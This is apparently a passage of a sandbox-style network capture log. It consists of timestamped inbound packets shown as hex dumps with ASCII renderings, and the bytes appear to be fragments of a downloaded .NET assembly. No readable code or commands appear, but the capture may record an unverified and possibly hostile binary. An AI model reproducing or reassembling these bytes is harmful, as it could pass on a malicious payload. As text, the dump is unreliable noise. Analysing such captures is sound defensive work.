2023-11-18 09:02:34 UTC	146	IN	Data Raw: 0e 00 5c 84 a7 78 12 00 a3 73 dd 9e 06 00 5a 95 a4 72 06 00 92 83 7f 16 0e 00 c7 c0 a7 78 0a 00 9a 01 b9 1f 0a 00 6a 4f ca 65 06 00 0b 4d bc 73 06 00 4f 33 09 9f 06 00 f4 76 99 6a 0a 00 1d 90 ca 65 0a 00 62 4b ca 65 0a 00 75 4e ca 65 06 00 fc 83 99 6a 06 00 a6 33 99 6a 06 00 9f 2c 99 6a 06 00 73 01 b9 1f 06 00 cb 01 b9 1f 06 00 bf 01 b9 1f 0a 00 5f 4e ca 65 06 00 b0 01 99 6a 0e 00 ed 9a a7 78 06 00 6f 7a a4 72 7f 00 8f 74 00 00 1f 02 41 8f 00 00 0a 00 ee 73 f0 25 0e 00 b4 76 a7 78 06 00 59 33 b9 72 06 00 b4 7a b9 72 06 00 ee b8 b9 72 06 00 d6 72 a4 9e 06 00 37 4c a4 9e 06 00 e0 55 a4 9e 06 00 72 98 bc 73 06 00 d6 83 99 6a 06 00 19 4c a4 9e 06 00 6d 71 99 6a 06 00 2a 7a bc 73 06 00 ff 4b a4 9e 06 00 06 a3 a4 9e 06 00 9a 3f bc 73 06 00 c0 76 bc 73 06 00 44 Data Ascii: \xsZrxjOeMsO3vjebKeuNej3j,js_NejxozrtAs%vxY3rzrrr7LUrsjLmqj*zsK?svsD
2023-11-18 09:02:34 UTC	149	IN	Data Raw: 00 04 8d 08 03 01 00 00 7a 61 00 00 6d 00 03 04 94 08 03 01 00 00 ab 5e 00 00 6d 00 03 04 98 08 05 01 10 00 02 40 00 00 71 00 03 04 9c 08 0b 01 10 00 04 7f 00 00 ad 00 08 04 9d 08 05 01 00 00 9d 45 00 00 d9 00 09 04 9d 08 0d 01 10 00 73 16 00 00 ad 00 18 04 9d 08 05 01 00 00 a7 8a 00 00 6d 00 23 04 9d 08 05 01 00 00 f7 a9 00 00 6d 00 23 04 a1 08 05 01 00 00 f7 b6 00 00 6d 00 23 04 a5 08 05 01 00 00 1a b7 00 00 6d 00 23 04 a9 08 02 01 00 00 5b 48 00 00 6d 00 23 04 ad 08 02 01 00 00 7a a9 00 00 6d 00 23 04 b1 08 02 01 00 00 41 bb 00 00 6d 00 23 04 b5 08 02 01 00 00 97 a9 00 00 6d 00 23 04 b9 08 02 01 00 00 c5 bf 00 00 6d 00 23 04 bd 08 02 01 00 00 f5 6d 00 00 6d 00 23 04 c1 08 02 01 00 00 be 47 00 00 6d 00 23 04 c5 08 02 01 00 00 b6 8a 00 00 6d 00 23 04 c9 Data Ascii: zam^m@qEsm#m#m#m#[Hm#zm#Am#m#m#mm#Gm#m#
2023-11-18 09:02:34 UTC	153	IN	Data Raw: 80 af 49 e6 2e 56 80 f9 22 e6 2e 56 80 10 6a e6 2e 56 80 da a2 e6 2e 56 80 4f 62 e6 2e 56 80 2a 62 e6 2e 56 80 9b 47 e6 2e 56 80 8b 47 e6 2e 56 80 bd 6d e6 2e 56 80 68 53 e6 2e 56 80 67 62 e6 2e 56 80 96 7b e6 2e 56 80 d5 62 e6 2e 56 80 08 ae e6 2e 56 80 ee 7b e6 2e 56 80 e6 5c e6 2e 56 80 0a 5d e6 2e 56 80 82 2e e6 2e 56 80 a5 5d e6 2e 56 80 77 1f e6 2e 56 80 8a 1f e6 2e 56 80 61 1f e6 2e 56 80 46 1a e6 2e 56 80 5e 91 e6 2e 56 80 90 30 e6 2e 56 80 9e 1c e6 2e 56 80 3c c0 e6 2e 56 80 c1 b3 e6 2e 56 80 a5 b5 e6 2e 56 80 01 8c e6 2e 56 80 14 8c e6 2e 56 80 8d 5c e6 2e 56 80 f8 5c e6 2e 56 80 af 64 e6 2e 56 80 eb 62 e6 2e 56 80 ba 1c e6 2e 56 80 b1 2b e6 2e 56 80 5b ba e6 2e 56 80 2a c0 e6 2e 56 80 93 62 e6 2e 56 80 e1 61 e6 2e 56 80 ca 25 e6 2e 56 80 d5 ac Data Ascii: I.V".Vj.V.VOb.Vb.VG.VG.Vm.VhS.Vgb.V{.Vb.V.V{.V\.V].V..V].Vw.V.Va.VF.V^.V0.V.V<.V.V.V.V.V\.V\.Vd.Vb.V.V+.V[.V.Vb.Va.V%.V
2023-11-18 09:02:34 UTC	158	IN	Data Raw: 00 00 00 00 c3 02 6d 1d 3e 34 68 00 54 3a 00 00 00 00 c3 02 8d 67 4a 34 6c 00 9c 3a 00 00 00 00 c3 02 e6 b2 54 34 6f 00 00 3b 00 00 00 00 c3 02 ad 3d 5d 34 71 00 74 3b 00 00 00 00 c3 02 c0 ba 67 34 74 00 e2 3b 00 00 00 00 c3 02 00 b3 71 34 77 00 f4 3b 00 00 00 00 c3 02 da 3d 78 34 78 00 36 3c 00 00 00 00 c3 02 ab c2 80 34 7a 00 4c 3c 00 00 00 00 c3 02 50 43 8a 34 7c 00 c0 3c 00 00 00 00 c3 02 d0 ba 96 34 7f 00 f8 3c 00 00 00 00 c3 02 64 3d 78 34 81 00 20 3d 00 00 00 00 c3 02 82 3c 78 34 83 00 48 3d 00 00 00 00 c3 02 35 39 78 34 85 00 70 3d 00 00 00 00 c3 02 49 b5 9e 34 87 00 9c 3d 00 00 00 00 c3 02 51 1a a4 34 89 00 3c 3e 00 00 00 00 c3 02 34 a9 b6 34 92 00 d3 3e 00 00 00 00 c3 02 24 34 be 34 94 00 e6 3e 00 00 00 00 c3 02 de 6c c6 34 96 00 fb 3e 00 00 00 Data Ascii: m>4hT:gJ4l:T4o;=]4qt;g4t;q4w;=x4x6<4zL<PC4\|<4<d=x4 =<x4H=59x4p=I4=Q4<>44>$44>l4>
2023-11-18 09:02:34 UTC	162	IN	Data Raw: 00 00 00 c6 08 c5 b5 01 00 c0 02 7b 74 00 00 00 00 c6 08 63 42 b9 37 c1 02 84 74 00 00 00 00 c6 08 73 42 bf 37 c1 02 96 74 00 00 00 00 c4 00 03 8a c6 37 c2 02 9e 74 00 00 00 00 86 00 23 8a cc 37 c2 02 ac 74 00 00 00 00 86 08 a8 74 d2 37 c2 02 bc 74 00 00 00 00 86 08 b7 74 63 37 c2 02 1d 75 00 00 00 00 c4 08 c6 74 d7 37 c3 02 25 75 00 00 00 00 c4 08 d7 74 4c 06 c3 02 33 75 00 00 00 00 86 08 a9 a1 dd 37 c4 02 41 75 00 00 00 00 c4 08 17 74 e3 37 c4 02 49 75 00 00 00 00 86 08 f4 72 e9 37 c4 02 58 75 00 00 00 00 86 08 04 73 ef 37 c4 02 cd 75 00 00 00 00 c4 08 23 73 f6 37 c5 02 d5 75 00 00 00 00 c4 08 35 73 fc 37 c5 02 e4 75 00 00 00 00 86 00 19 bf 06 00 c6 02 e4 76 00 00 00 00 81 00 9f 83 06 00 c6 02 73 77 00 00 00 00 c4 00 f2 82 5d 07 c6 02 7c 77 00 00 00 00 Data Ascii: {tcB7tsB7t7t#7tt7ttc7ut7%utL3u7Aut7Iur7Xus7u#s7u5s7uvsw]\|w
2023-11-18 09:02:34 UTC	166	IN	Data Raw: 00 00 86 08 26 c2 68 39 17 04 e1 eb 00 00 00 00 86 08 2f c2 68 39 18 04 14 ec 00 00 00 00 86 08 6f a3 6f 39 19 04 67 ec 00 00 00 00 86 08 7c a3 6f 39 1a 04 9c ec 00 00 00 00 86 08 22 54 76 39 1b 04 e9 ec 00 00 00 00 86 08 30 54 76 39 1c 04 1c ed 00 00 00 00 86 08 3a 48 7d 39 1d 04 69 ed 00 00 00 00 86 08 45 48 7d 39 1e 04 9c ed 00 00 00 00 81 00 94 61 b7 3b 1f 04 48 ee 00 00 00 00 81 00 df 60 bf 3b 21 04 f0 ee 00 00 00 00 81 00 b2 60 c6 3b 22 04 b8 ef 00 00 00 00 81 00 d4 5e d4 3b 28 04 48 f0 00 00 00 00 86 08 7c ac 84 39 2d 04 95 f0 00 00 00 00 86 08 87 ac 84 39 2e 04 c8 f0 00 00 00 00 86 08 11 2b 8b 39 2f 04 15 f1 00 00 00 00 86 08 1b 2b 8b 39 30 04 48 f1 00 00 00 00 81 00 8e 5e dd 3b 31 04 d4 f1 00 00 00 00 86 08 4c 5e c5 16 33 04 21 f2 00 00 00 00 86 Data Ascii: &h9/h9oo9g\|o9"Tv90Tv9:H}9iEH}9a;H`;!`;"^;(H\|9-9.+9/+90H^;1L^3!
2023-11-18 09:02:34 UTC	170	IN	Data Raw: 00 c6 00 f2 96 26 16 b5 05 e4 32 01 00 00 00 c6 00 44 82 06 09 ba 05 9c 33 01 00 00 00 c6 00 08 a1 30 16 bb 05 94 34 01 00 00 00 c6 00 5c 3b fd 02 c0 05 e8 34 01 00 00 00 c6 00 6b 40 3a 16 c1 05 a0 35 01 00 00 00 c6 00 15 65 41 16 c2 05 84 36 01 00 00 00 c6 00 24 34 48 16 c3 05 3b 37 01 00 00 00 86 00 75 c2 65 3f c4 05 7a 37 01 00 00 00 c6 00 4e 42 c6 12 c5 05 bc 37 01 00 00 00 c6 00 af a8 4d 16 c6 05 7c 38 01 00 00 00 c6 00 d2 26 52 16 c7 05 68 39 01 00 00 00 c6 00 aa 0b 59 16 c8 05 20 3a 01 00 00 00 c6 00 7a 04 10 0c c9 05 d8 3a 01 00 00 00 c6 00 ab 08 39 0c ca 05 90 3b 01 00 00 00 c6 00 28 3f fd 02 cb 05 e0 3b 01 00 00 00 86 00 95 3c fd 02 cc 05 30 3c 01 00 00 00 86 00 8a 39 fd 02 cd 05 80 3c 01 00 00 00 86 00 77 3d fd 02 ce 05 d0 3c 01 00 00 00 c6 00 Data Ascii: &2D304\;4k@:5eA6$4H;7ue?z7NB7M\|8&Rh9Y :z:9;(?;<0<9<w=<
2023-11-18 09:02:34 UTC	174	IN	Data Raw: c6 00 3e a7 10 00 5d 07 3e 8d 01 00 00 00 c6 00 3e a7 01 00 5e 07 53 8d 01 00 00 00 c4 00 70 8a 23 17 5f 07 63 8d 01 00 00 00 c4 00 70 8a 14 17 61 07 7e 8d 01 00 00 00 83 00 2d 29 06 00 63 07 88 8d 01 00 00 00 83 00 da a1 d6 42 63 07 14 8f 01 00 00 00 83 18 e8 8f dd 42 64 07 f1 8f 01 00 00 00 e6 01 ee 47 06 00 69 07 00 90 01 00 00 00 81 00 b1 24 06 00 69 07 20 90 01 00 00 00 81 00 ee 47 15 00 69 07 78 90 01 00 00 00 c4 00 ff 53 06 00 6a 07 a8 90 01 00 00 00 83 00 cc 93 ec 42 6a 07 e0 90 01 00 00 00 83 00 43 8a f4 42 6c 07 68 91 01 00 00 00 83 00 cb a1 06 00 6e 07 a4 91 01 00 00 00 91 00 2d 75 fc 42 6e 07 e4 91 01 00 00 00 81 00 70 5f 04 43 6f 07 ec 92 01 00 00 00 81 00 15 8a ce 42 72 07 4d 97 01 00 00 00 83 08 c5 9f 0e 43 74 07 58 97 01 00 00 00 83 00 63 Data Ascii: >]>>^Sp#_cpa~-)cBcBdGi$i GixSjBjCBlhn-uBnp_CoBrMCtXc
2023-11-18 09:02:34 UTC	178	IN	Data Raw: 00 30 35 43 01 9f 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 9f 09 b8 b8 01 00 00 00 96 08 48 ac 9c 47 9f 09 e8 b9 01 00 00 00 83 18 e8 8f 94 47 a0 09 e0 b8 01 00 00 00 81 18 e8 8f 06 00 a2 09 00 ba 01 00 00 00 c4 00 30 35 43 01 a2 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 a2 09 b8 b8 01 00 00 00 96 08 48 ac a3 47 a2 09 60 ba 01 00 00 00 83 18 e8 8f 94 47 a3 09 e0 b8 01 00 00 00 81 18 e8 8f 06 00 a5 09 78 ba 01 00 00 00 c4 00 30 35 43 01 a5 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 a5 09 a4 80 00 00 00 00 83 18 e8 8f 06 00 a5 09 d8 ba 01 00 00 00 93 08 25 85 aa 47 a5 09 04 bb 01 00 00 00 93 08 d8 45 cc 01 a5 09 0b bb 01 00 00 00 93 08 e4 45 b0 47 a5 09 13 bb 01 00 00 00 93 08 2b 96 40 13 a6 09 29 bb 01 00 00 00 93 08 5c 92 40 13 a6 09 3f bb 01 00 00 00 93 08 37 9f Data Ascii: 05C`&CHGG05C`&CHG`Gx05C`&C%GEEG+@)\@?7
2023-11-18 09:02:34 UTC	181	IN	Data Raw: 02 37 4d 4a a3 0a 1c de 01 00 00 00 81 00 af 37 61 19 a4 0a 29 de 01 00 00 00 81 00 54 37 52 4a a5 0a 38 de 01 00 00 00 81 00 54 37 58 4a a5 0a 7c e2 01 00 00 00 81 00 7d 37 61 4a a6 0a 94 e6 01 00 00 00 81 00 6a a9 6a 4a a7 0a 60 e7 01 00 00 00 81 00 83 a9 79 4a ae 0a 24 e8 01 00 00 00 91 00 a9 8c 81 4a b0 0a 6c e9 01 00 00 00 91 00 a9 8c 8c 4a b5 0a a0 e9 01 00 00 00 91 00 27 8d 81 4a ba 0a e0 e9 01 00 00 00 91 00 27 8d 99 4a bf 0a ba 8a 01 00 00 00 c4 01 7e 69 a6 4a c4 0a 13 ea 01 00 00 00 c4 01 67 69 a6 4a c4 0a 1b ea 01 00 00 00 c4 01 7b 31 e5 02 c4 0a 34 ea 01 00 00 00 c4 01 e1 31 61 19 c4 0a 8b ea 01 00 00 00 c4 01 5b 31 61 19 c5 0a 9c ea 01 00 00 00 c4 01 ab 8d e5 02 c6 0a b2 ea 01 00 00 00 c4 01 87 8d 61 19 c6 0a ba ea 01 00 00 00 91 00 ba 8d ac Data Ascii: 7MJ7a)T7RJ8T7XJ\|}7aJjjJ`yJ$JlJ'J'J~iJgiJ{141a[1aa
2023-11-18 09:02:34 UTC	183	IN	Data Raw: 00 00 c6 00 7b a9 64 49 94 0b 42 fd 01 00 00 00 c6 00 42 bb 75 49 99 0b 55 fd 01 00 00 00 c6 00 98 a9 81 49 9b 0b 68 fd 01 00 00 00 c6 00 c6 bf 81 49 9c 0b 7b fd 01 00 00 00 c6 00 00 6e 8a 49 9d 0b 8e fd 01 00 00 00 c6 00 ca 47 97 49 9f 0b a1 fd 01 00 00 00 c6 00 b7 8a a0 49 a0 0b b4 fd 01 00 00 00 c6 00 55 b7 97 49 a4 0b c7 fd 01 00 00 00 c6 00 bf 55 af 49 a5 0b e0 fd 01 00 00 00 c6 00 1e 6f b6 49 a6 0b f3 fd 01 00 00 00 c6 00 a6 21 c3 49 a9 0b 06 fe 01 00 00 00 c6 00 54 48 ce 49 ab 0b 19 fe 01 00 00 00 c6 00 7f 6e 81 49 ae 0b 2c fe 01 00 00 00 c6 00 15 20 81 49 af 0b 3f fe 01 00 00 00 c6 00 a5 ac 81 49 b0 0b 52 fe 01 00 00 00 c6 00 10 62 81 49 b1 0b 65 fe 01 00 00 00 c6 00 b1 75 dd 49 b2 0b 7e fe 01 00 00 00 c6 00 c5 3f ec 49 b7 0b 91 fe 01 00 00 00 c6 Data Ascii: {dIBBuIUIhI{nIGIIUIUIoI!ITHInI, I?IRbIeuI~?I
2023-11-18 09:02:34 UTC	187	IN	Data Raw: 00 c6 01 e9 30 3a 35 19 0d 00 00 00 00 03 00 c6 01 e4 30 fb 3b 1a 0d 00 00 00 00 03 00 c6 01 da 30 31 3c 1d 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 1e 0d 00 00 00 00 03 00 c6 01 e9 30 22 48 20 0d 00 00 00 00 03 00 c6 01 e4 30 9a 4d 23 0d 00 00 00 00 03 00 c6 01 da 30 a5 4d 28 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 29 0d 00 00 00 00 03 00 c6 01 e9 30 2b 48 2b 0d 00 00 00 00 03 00 c6 01 e4 30 de 4d 2d 0d 00 00 00 00 03 00 c6 01 da 30 e9 4d 31 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 33 0d 00 00 00 00 03 00 c6 01 e9 30 34 48 35 0d 00 00 00 00 03 00 c6 01 e4 30 f3 4d 39 0d 00 00 00 00 03 00 c6 01 da 30 e9 4d 3f 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 41 0d 00 00 00 00 03 00 c6 01 e9 30 07 48 43 0d 00 00 00 00 03 00 c6 01 e4 30 fb 3b 44 0d 00 00 00 00 03 00 c6 01 Data Ascii: 0:50;01<0"H 0M#0M()0+H+0M-0M1304H50M90M?A0HC0;D
2023-11-18 09:02:34 UTC	191	IN	Data Raw: 00 00 01 00 3c 46 00 00 02 00 53 33 00 00 03 00 25 6f 00 00 04 00 c5 b9 00 00 05 00 50 41 00 00 06 00 c2 2b 00 00 07 00 ec 67 00 00 08 00 e9 bd 00 00 09 00 59 ae 00 00 01 00 57 47 00 00 02 00 a7 bb 00 00 03 00 25 6f 00 00 04 00 79 2e 00 00 05 00 ee 8c 00 00 06 00 e7 2b 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 03 00 00 ac 00 00 04 Data Ascii: <FS3%oPA+gYWG%oy.+
2023-11-18 09:02:34 UTC	196	IN	Data Raw: ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 01 00 d2 84 00 00 02 00 70 54 00 00 03 00 b1 61 00 00 04 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 95 2c 00 00 02 00 0e 39 00 00 03 00 98 72 00 00 04 00 f0 3d 00 00 05 00 85 93 00 00 06 00 6b 93 00 00 07 00 7a 93 00 00 08 00 20 c2 00 00 01 00 95 2c 00 00 02 00 0e 39 00 00 03 00 98 72 00 00 04 00 f0 3d 00 00 05 00 85 93 00 00 Data Ascii: >x)pTpTa>>x)pTpTa>>x)pTpTa>>x),9r=kz ,9r=
2023-11-18 09:02:34 UTC	199	IN	Data Raw: 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 d2 6e 00 00 05 00 6a 71 00 00 01 00 95 2c 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 85 75 00 00 05 00 cb 32 00 00 06 00 62 6f 00 00 07 00 20 31 00 00 08 00 d2 6e 00 00 09 00 6a 71 00 00 0a 00 df 51 00 00 01 00 ab 3e 00 00 02 00 be 43 00 00 03 00 89 53 00 00 04 00 85 75 00 00 05 00 62 6f 00 00 06 00 20 31 00 00 07 00 d2 6e 00 00 08 00 6a 71 00 00 09 00 92 57 00 00 0a 00 df 51 00 00 01 00 be 43 00 00 02 00 89 53 00 00 01 00 be 43 00 00 02 00 89 53 00 00 03 00 d2 6e 00 00 01 00 be 43 00 00 02 00 89 53 00 00 03 00 d2 6e 00 00 04 00 6a 71 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 00 df 51 00 00 01 Data Ascii: >CSnjq,>CSu2bo 1njqQ>CSubo 1njqWQCSCSnCSnjqQQQQQQQ
2023-11-18 09:02:34 UTC	203	IN	Data Raw: 1c 00 00 02 00 1b bb 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 02 00 ca 8d 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 02 00 e6 6b 00 00 03 00 11 91 00 00 04 00 5c 1f 00 00 05 00 2f b9 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 01 00 ca 8d 00 00 02 00 0c b9 00 00 03 00 a7 bb 00 00 01 00 ca 8d 00 00 02 00 ac 21 00 00 01 00 c7 1c 00 00 02 00 5c 1f 00 00 03 00 2f b9 00 00 04 00 ac 21 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 01 00 c7 1c 00 00 02 00 bd 5b 00 00 03 00 b8 3f 00 00 04 00 b1 61 00 00 05 00 16 1b 00 00 01 00 c7 1c 00 00 02 00 34 b9 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 c7 1c 00 00 02 00 21 b1 00 00 01 00 0c b9 00 00 01 00 df 51 00 00 01 00 df 51 00 00 Data Ascii: k\/!\/![?a4!!!QQ
2023-11-18 09:02:34 UTC	207	IN	Data Raw: 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 fe 44 00 00 03 00 d5 8f 00 00 01 00 27 b9 00 00 02 00 fe 44 00 00 03 00 d5 8f 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 91 1a 00 00 02 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 01 00 27 b9 00 00 02 00 97 1a 00 00 03 00 91 1a 00 00 04 00 b1 61 00 00 05 00 3e a9 00 00 01 00 de ad 00 00 01 00 3e a9 00 00 02 00 78 29 00 00 01 00 66 1c 00 00 02 00 3e bc 00 00 03 00 5c 1f 00 00 04 00 2f b9 00 00 05 00 c7 1c 00 Data Ascii: >>x)'D'Da>>x)''a>>x)''a>>x)f>\/
2023-11-18 09:02:34 UTC	212	IN	Data Raw: 8f 06 00 81 03 59 58 10 00 81 03 e2 a6 e8 09 81 03 37 6a 11 07 89 03 3b c2 fc 09 89 03 47 c2 fc 09 e9 06 39 6e 16 0a c1 05 da 8a 1c 0a 69 01 d6 91 99 03 0c 01 8c 51 72 01 b1 01 f9 47 28 0a 09 06 f6 47 31 0a 21 01 66 a7 3e 0a e9 05 e9 9c a4 0a 1c 01 e8 8f 84 02 1c 01 4d 51 43 01 1c 01 11 50 d6 00 29 06 72 04 b6 0a 99 06 e8 8f 10 00 09 05 41 54 be 0a f1 06 e8 8f 10 00 0c 01 b3 bd 7b 01 0c 01 40 6a 64 01 f9 06 d4 6f cc 0a 89 03 14 b0 d1 0a 19 02 8e 73 d7 0a 24 01 e8 8f 06 00 2c 01 40 6a 64 01 41 03 47 c2 ed 0a 41 03 28 3f f7 0a c1 04 33 70 fd 0a 41 03 3b c2 ed 0a 41 03 c5 23 03 0b 41 03 82 96 0b 0b e1 05 c1 64 68 03 e1 05 48 04 28 0b e1 05 3e 04 2f 0b e1 05 ce 64 35 0b 59 05 6c 6e 3a 0b 59 05 0e 1b 11 07 59 05 0c c1 ed 00 f9 06 2d 82 40 0b f9 06 2a 82 40 0b Data Ascii: YX7j;G9niQrG(G1!f>MQCP)rAT{@jdos$,@jdAGA(?3pA;A#AdhH(>/d5Yln:YY-@*@
2023-11-18 09:02:34 UTC	216	IN	Data Raw: 50 02 2b 24 08 00 58 02 5d 21 08 00 5c 02 62 21 08 00 60 02 67 21 08 00 64 02 ae 23 08 00 68 02 6c 21 08 00 6c 02 b3 23 08 00 70 02 7b 21 08 00 74 02 b8 23 08 00 78 02 bd 23 08 00 7c 02 c2 23 08 00 80 02 c7 23 08 00 84 02 cc 23 08 00 88 02 30 24 08 00 8c 02 35 24 08 00 90 02 3a 24 08 00 94 02 53 21 08 00 98 02 3f 24 08 00 9c 02 44 24 08 00 a0 02 49 24 08 00 a4 02 4e 24 08 00 a8 02 53 24 08 00 ac 02 58 24 08 00 b0 02 5d 24 08 00 b4 02 62 24 08 00 b8 02 67 24 08 00 bc 02 6c 24 08 00 c0 02 71 24 08 00 c4 02 76 24 08 00 c8 02 7b 24 08 00 d0 02 5d 21 08 00 d4 02 62 21 08 00 d8 02 67 21 08 00 dc 02 6c 21 08 00 e0 02 bd 23 08 00 e8 02 80 24 08 00 ec 02 5d 21 08 00 f0 02 62 21 08 00 f4 02 67 21 08 00 f8 02 ae 23 08 00 fc 02 6c 21 08 00 00 03 b3 23 08 00 04 03 7b Data Ascii: P+$X]!\b!`g!d#hl!l#p{!t#x#\|###0$5$:$S!?$D$I$N$S$X$]$b$g$l$q$v${$]!b!g!l!#$]!b!g!#l!#{
2023-11-18 09:02:34 UTC	220	IN	Data Raw: 00 db 00 c8 54 a3 16 00 00 9b 00 f9 4f c3 16 00 00 9b 00 f9 4f e3 16 00 00 9b 00 f9 4f 03 17 00 00 9b 00 f9 4f 23 17 00 00 9b 00 f9 4f 43 17 00 00 9b 00 f9 4f 63 17 00 00 9b 00 f9 4f 83 17 00 00 9b 00 f9 4f a3 17 00 00 9b 00 f9 4f c3 17 00 00 9b 00 f9 4f e3 17 00 00 9b 00 f9 4f 03 18 00 00 9b 00 f9 4f 23 18 00 00 9b 00 f9 4f 43 18 00 00 9b 00 f9 4f 63 18 00 00 9b 00 f9 4f 69 18 00 00 1b 01 f9 4f 83 18 00 00 9b 00 f9 4f 89 18 00 00 1b 01 f9 4f a3 18 00 00 9b 00 f9 4f c3 18 00 00 9b 00 f9 4f e3 18 00 00 9b 00 f9 4f 03 19 00 00 9b 00 f9 4f 23 19 00 00 9b 00 f9 4f 43 19 00 00 9b 00 f9 4f 63 19 00 00 9b 00 f9 4f 83 19 00 00 9b 00 f9 4f a3 19 00 00 9b 00 f9 4f c3 19 00 00 9b 00 f9 4f e3 19 00 00 9b 00 f9 4f e3 1a 00 00 9b 00 3b 58 e3 1a 00 00 a3 01 62 21 23 1b Data Ascii: TOOOO#OCOcOOOOOO#OCOcOiOOOOOOO#OCOcOOOOO;Xb!#
2023-11-18 09:02:34 UTC	226	IN	Data Raw: 89 11 a7 11 c1 11 d7 11 de 11 f2 11 fb 11 14 12 22 12 4c 12 67 12 6d 13 8e 13 98 13 14 14 48 14 84 14 93 14 a2 14 ac 14 cb 15 d7 15 e0 15 e9 15 f6 15 fc 16 05 17 18 19 b4 19 bb 19 c2 1a 75 1b 7e 1b 87 1b 56 1c a7 1c ce 1c da 1c 5d 1d 71 1d 87 1d 8d 1d 9e 1d 00 02 95 0a 12 40 01 00 62 12 97 0a 32 6e 01 00 40 02 99 0a e3 47 01 00 66 11 9f 0a f5 bf 02 00 00 01 a1 0a 8a 7a 02 00 00 01 d7 0a b7 19 03 00 00 01 d9 0a 73 05 03 00 00 01 db 0a 9d 0a 03 00 00 01 dd 0a 89 2a 03 00 00 01 df 0a ab 54 03 00 00 01 e1 0a a9 04 03 00 00 01 e3 0a ca 1e 03 00 00 01 e5 0a 80 09 03 00 00 01 e7 0a d5 20 03 00 00 01 e9 0a d0 1b 03 00 00 01 eb 0a 55 01 03 00 00 01 ed 0a 05 0a 03 00 00 01 ef 0a 96 04 03 00 00 01 f1 0a ab 03 03 00 00 01 f3 0a 3e 1d 03 00 00 01 f5 0a 84 1b 03 00 00 Data Ascii: "LgmHu~V]q@b2n@Gfzs*T U>
2023-11-18 09:02:34 UTC	231	IN	Data Raw: 34 39 00 53 49 33 36 65 36 37 31 36 30 30 35 32 66 37 66 36 39 00 53 49 64 62 62 65 31 62 35 32 66 33 30 34 66 33 37 39 00 53 49 31 35 30 39 35 33 64 63 36 32 66 30 61 38 37 39 00 53 49 36 37 34 63 33 62 63 30 37 66 63 31 37 39 37 39 00 53 49 63 30 62 62 34 65 61 62 37 37 66 35 61 39 39 39 00 34 38 44 45 37 35 34 43 43 30 43 37 37 36 44 41 44 31 41 38 35 44 42 38 31 42 45 46 41 41 41 44 45 33 41 34 34 37 45 39 00 53 49 30 37 35 32 35 38 66 65 37 33 33 32 66 35 63 39 00 53 49 65 36 34 30 35 64 66 64 37 62 36 33 65 61 64 39 00 53 49 32 34 30 39 63 37 65 31 65 62 35 30 30 63 65 39 00 53 49 36 65 36 63 35 34 34 63 30 32 38 62 32 64 65 39 00 53 49 65 35 37 61 61 37 37 63 38 38 38 34 64 33 66 39 00 3c 4d 6f 64 75 6c 65 3e 00 3c 50 72 69 76 61 74 65 49 6d 70 6c Data Ascii: 49SI36e67160052f7f69SIdbbe1b52f304f379SI150953dc62f0a879SI674c3bc07fc17979SIc0bb4eab77f5a99948DE754CC0C776DAD1A85DB81BEFAAADE3A447E9SI075258fe7332f5c9SIe6405dfd7b63ead9SI2409c7e1eb500ce9SI6e6c544c028b2de9SIe57aa77c8884d3f9<Module><PrivateImpl
